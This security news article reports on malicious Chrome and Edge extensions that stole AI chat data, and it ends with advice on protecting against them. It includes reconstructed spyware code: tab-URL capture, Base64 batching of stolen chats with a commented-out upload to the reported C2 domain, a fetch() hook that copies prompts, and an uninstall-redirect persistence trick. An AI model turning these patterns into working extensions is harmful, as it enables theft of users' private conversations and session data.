Over 9 million Chrome and Edge users have had their private AI conversations stolen by malicious browser extensions disguised as productivity and privacy tools. In two separate campaigns, extensions carrying Google’s “Featured” badge secretly exfiltrated ChatGPT, DeepSeek, and other AI chat data to remote servers.
Dual Security Breaches Target AI Users
Two separate malware campaigns have exposed a critical vulnerability in browser extension security, compromising millions of users who trusted Google’s vetting process. Security researchers from OX Security and Koi Security independently uncovered the sophisticated data theft operations that specifically targeted private conversations with artificial intelligence platforms.
The first campaign, discovered by OX Security on December 29, 2025, affected approximately 900,000 Chrome users through two malicious extensions that impersonated the legitimate AITOPIA AI assistant plugin. The second campaign, revealed by Koi Security in mid-December 2025, compromised over 8 million users across Chrome and Microsoft Edge through VPN and ad-blocking extensions that had been secretly harvesting AI chats since July 2025.
The 900,000-User Attack
OX Security’s investigation revealed two malicious extensions that cloned the legitimate AITOPIA Chrome extension to evade detection. The extensions “Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI” accumulated 600,000 installations, while “AI Sidebar with Deepseek, ChatGPT, Claude, and more” reached 300,000 installations.
Both extensions received Google’s “Featured” badge on the Chrome Web Store, a designation intended to signal compliance with security best practices. The malware mimicked AITOPIA’s user interface and functionality so precisely that users experienced no noticeable disruption while their data was being exfiltrated.
The attackers manipulated Chrome’s permissions system by requesting access under the pretense of collecting “anonymous, non-identifiable analytics,” which they exploited for widespread surveillance. Once installed, the extensions assigned each user a unique identifier and began monitoring browser activity, specifically targeting visits to ChatGPT and DeepSeek platforms.
How the Data Theft Operated
The malicious extensions employed sophisticated techniques to harvest sensitive information. They scraped chat content directly from the Document Object Model (DOM) using Chrome’s tabs.onUpdated API to capture conversation data and all active tab URLs. This exposed users’ browsing habits, research keywords, and potentially sensitive query parameters.
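The tab-monitoring step described above takes only a few lines of extension code. The following is a hypothetical reconstruction, not the actual malware: the `chrome` object is stubbed so the sketch runs outside a browser, and the listener logic and platform regex are assumptions.

```javascript
// Minimal stub of the Chrome extension API so this sketch runs in Node.
// In a real extension, chrome.tabs.onUpdated is provided by the browser.
const listeners = [];
const chrome = {
  tabs: { onUpdated: { addListener: (fn) => listeners.push(fn) } },
};

const capturedUrls = [];

// Hypothetical spyware logic: record every URL a tab navigates to,
// flagging visits to AI chat platforms for later DOM scraping.
chrome.tabs.onUpdated.addListener((tabId, changeInfo) => {
  if (changeInfo.url) {
    capturedUrls.push({
      tabId,
      url: changeInfo.url,
      isAiChat: /chatgpt\.com|chat\.deepseek\.com/.test(changeInfo.url),
    });
  }
});

// Simulate two navigation events the browser would normally fire.
listeners[0](1, { url: "https://chatgpt.com/c/abc123" });
listeners[0](2, { url: "https://example.com/news" });
```

Because the listener sees every tab update, even non-AI browsing (the second event above) ends up in the capture buffer, which is how ordinary URLs and query strings leaked alongside chat data.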
The stolen data was encoded in Base64 format and transmitted to command-and-control servers at deepaichats[.]com and chatsaigpt[.]com every 30 minutes. The extensions cached data locally before batch-uploading it to attacker-controlled infrastructure hosted on Lovable, complicating attribution efforts.
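The cache-then-batch-upload pattern is trivial to implement, which is part of why it evades casual inspection. A hypothetical sketch follows; the field layout is an assumption, and the network call to the reported C2 domain is left commented out:

```javascript
// Hypothetical exfiltration buffer: scraped chats are cached locally,
// then flushed as Base64-encoded batches on a timer.
const cache = [];

function cacheChat(userId, platform, text) {
  cache.push({ userId, platform, text, ts: Date.now() });
}

function buildPayload() {
  // Drain the cache and Base64-encode the batch,
  // as the real extensions reportedly did.
  const json = JSON.stringify(cache.splice(0, cache.length));
  return Buffer.from(json, "utf8").toString("base64");
}

cacheChat("uid-42", "chatgpt", "draft my Q3 pricing strategy");
const payload = buildPayload();

// In the actual malware a flush reportedly ran every 30 minutes, e.g.:
// setInterval(() => fetch("https://deepaichats[.]com/collect", {
//   method: "POST", body: buildPayload() }), 30 * 60 * 1000);
```

Base64 is an encoding, not encryption; it only obscures the payload from a quick glance at network traffic, and any analyst can decode it instantly.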
In a particularly insidious persistence mechanism, uninstalling one malicious extension automatically opened a browser tab suggesting installation of the other extension, ensuring continued access to user data.
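Chrome exposes a legitimate API, `chrome.runtime.setUninstallURL()`, that opens a page whenever an extension is removed; it is a plausible way this reinstall prompt was implemented, though the report does not confirm the mechanism. A stubbed sketch (the store URL is invented):

```javascript
// Stub of chrome.runtime so this runs outside a browser; in a real
// extension the browser opens the registered URL on uninstall.
let uninstallUrl = null;
const chrome = {
  runtime: { setUninstallURL: (url) => { uninstallUrl = url; } },
};

// Hypothetical persistence trick: when this extension is removed,
// the user lands on a page pushing the sibling malicious extension.
chrome.runtime.setUninstallURL(
  "https://chromewebstore.google.com/detail/ai-sidebar-example-id"
);
```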
The 8 Million-User VPN Campaign
The larger campaign, affecting over 8 million users, involved multiple extensions from publisher Urban Cybersecurity. The primary extension, Urban VPN Proxy, had accumulated more than 6 million Chrome installations and 1.3 million Edge installations before researchers discovered its malicious functionality.
Seven additional extensions from the same publisher contained identical data harvesting code, including 1ClickVPN Proxy, Urban Browser Guard, and Urban Ad Blocker. These extensions also carried “Featured” labels on browser stores, significantly increasing user trust.
The malicious behavior was introduced through version 5.5.0, released on July 9, 2025, and deployed via automatic updates without user awareness. The extensions were particularly deceptive because they were marketed as privacy and security tools, with Chrome Web Store listings describing the product as protecting users from entering personal information into AI chatbots.
Targeted AI Platforms
The VPN campaign monitored conversations across ten major AI platforms, among them:
| AI Platform | Data Collected |
| --- | --- |
| ChatGPT (OpenAI) | Full prompts, responses, conversation IDs |
| Google Gemini | User queries and AI responses |
| Anthropic Claude | Complete conversation threads |
| Microsoft Copilot | Prompts and generated content |
| Perplexity | Search queries and AI answers |
| DeepSeek | Chat interactions and metadata |
| Grok (xAI) | User inputs and outputs |
| Meta AI | Conversation data and timestamps |
Technical Exploitation Method
When users opened AI chat platforms in their browsers, the extensions injected platform-specific JavaScript directly into the web pages. These scripts overrode key browser network APIs, including fetch() and XMLHttpRequest, to intercept AI prompts, responses, conversation IDs, timestamps, and session metadata in the page context, before TLS encrypted the traffic in transit.
The captured data was then transmitted to remote analytics endpoints controlled by the extension operator or affiliated data brokers. Because the hooks sat at the application layer, inside the page itself, the extensions captured data regardless of whether their advertised protection features were enabled.
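API hooking of this kind is only a few lines of JavaScript. Below is a deliberately simplified, hypothetical reconstruction of the fetch() override: a mock fetch stands in for the browser implementation (a real injection would wrap `window.fetch`), and the endpoint pattern and capture format are assumptions.

```javascript
// Mock page-level fetch standing in for the browser's implementation.
let pageFetch = async (url, opts) => ({ ok: true, status: 200 });

const stolen = [];

// Hypothetical injected hook: wrap fetch so every outgoing AI prompt
// is copied before the request proceeds unchanged.
const originalFetch = pageFetch;
pageFetch = async (url, opts = {}) => {
  if (/\/backend-api\/conversation/.test(url) && opts.body) {
    stolen.push({ url, body: opts.body, ts: Date.now() });
  }
  return originalFetch(url, opts); // request continues as normal
};

// Simulate the page sending a chat prompt.
pageFetch("https://chatgpt.com/backend-api/conversation", {
  method: "POST",
  body: JSON.stringify({ prompt: "summarize our merger terms" }),
});
```

Because the wrapper forwards every request untouched, the page behaves exactly as before; the user sees a normal chat session while a copy of each prompt accumulates in the attacker's buffer.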
Google’s Response and Ongoing Risks
OX Security reported its findings to Google on December 29, 2025. However, as of December 30, 2025, both extensions from the 900,000-user campaign remained publicly available on the Chrome Web Store, with the most popular variant still displaying Google’s “Featured” badge.
This incident raises serious questions about Google’s extension vetting process, particularly the criteria for awarding “Featured” status to extensions that later prove malicious. The presence of multiple malicious extensions bearing security endorsements suggests systematic failures in the review process.
Privacy and Security Implications
Both campaigns represent sophisticated attacks on an increasingly sensitive category of data: AI conversations. Users frequently share confidential information with AI assistants, including proprietary business strategies, personal health concerns, legal questions, and financial data.
The extensions captured not only AI chat content but also session tokens that could potentially grant attackers access to user accounts. For enterprise users, the theft of internal corporate information discussed in AI conversations poses significant competitive intelligence and data breach risks.
The harvested browsing URLs and search parameters expose detailed user behavior patterns, research interests, and potentially identifying information embedded in URL query strings. This comprehensive surveillance capability extends far beyond the stated functionality of productivity or privacy tools.
Protecting Against Extension-Based Attacks
Security experts recommend several precautions for browser extension users. Users should carefully review permissions requested by extensions, particularly those requiring “Read and change all your data on all websites” access. This permission level grants extensions complete visibility into all browser activity, including rendered web page content.
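As a concrete illustration, a Manifest V3 extension requesting that access pattern might declare something like the following hypothetical manifest (not taken from either campaign). The combination of `<all_urls>` host permissions and a content script injected into every page is what surfaces Chrome’s “Read and change all your data on all websites” warning:

```json
{
  "name": "Example Over-Privileged Extension",
  "manifest_version": 3,
  "permissions": ["tabs", "storage"],
  "host_permissions": ["<all_urls>"],
  "content_scripts": [{
    "matches": ["<all_urls>"],
    "js": ["inject.js"],
    "run_at": "document_start"
  }]
}
```

A sidebar or chat assistant rarely needs access to every site; a manifest like this on a single-purpose tool is a strong signal to pause before installing.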
Even extensions with high ratings and “Featured” badges require scrutiny, as both campaigns demonstrated that these endorsements do not guarantee security. Users should verify extension publishers, check for suspicious permission requests, and regularly audit installed extensions for unnecessary or excessive access rights.
Organizations should implement browser extension whitelisting policies and educate employees about the risks of installing unvetted extensions, particularly on devices used for sensitive work.
Final Thoughts
The dual browser extension campaigns affecting over 9 million users represent a significant escalation in data theft targeting AI platform users. The sophisticated impersonation techniques, exploitation of trusted security badges, and specific focus on AI conversations indicate that threat actors recognize the value of this emerging data category.
The persistence of malicious extensions on official browser stores days after disclosure suggests ongoing risk for users who have not manually removed affected extensions. Both campaigns demonstrate that traditional security indicators like store ratings, featured badges, and high installation counts provide insufficient protection against determined attackers.
As AI platforms become increasingly integrated into personal and professional workflows, browser extension security will require enhanced scrutiny from both platform providers and users. The incidents underscore the critical need for improved extension vetting processes, mandatory security audits for featured extensions, and greater transparency about data collection practices.